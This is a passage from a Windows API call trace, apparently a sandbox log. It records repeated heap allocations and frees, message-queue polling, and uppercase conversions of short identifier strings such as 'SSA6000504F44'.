hHeap=0x25c0000) returned 1 [0255.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.354] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0255.354] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0255.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.355] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0255.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0255.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0255.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbacb) returned 0x24c7a50 [0255.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0255.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0255.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbacb) returned 0x24df000 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0255.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0255.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.359] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0255.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0255.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0255.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.360] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0255.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.360] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0255.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.361] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0255.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0255.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0255.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.363] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.363] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.363] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.364] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.364] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.364] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.364] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.364] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.364] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.364] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.365] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.365] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.365] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.366] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.366] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.366] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.366] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, 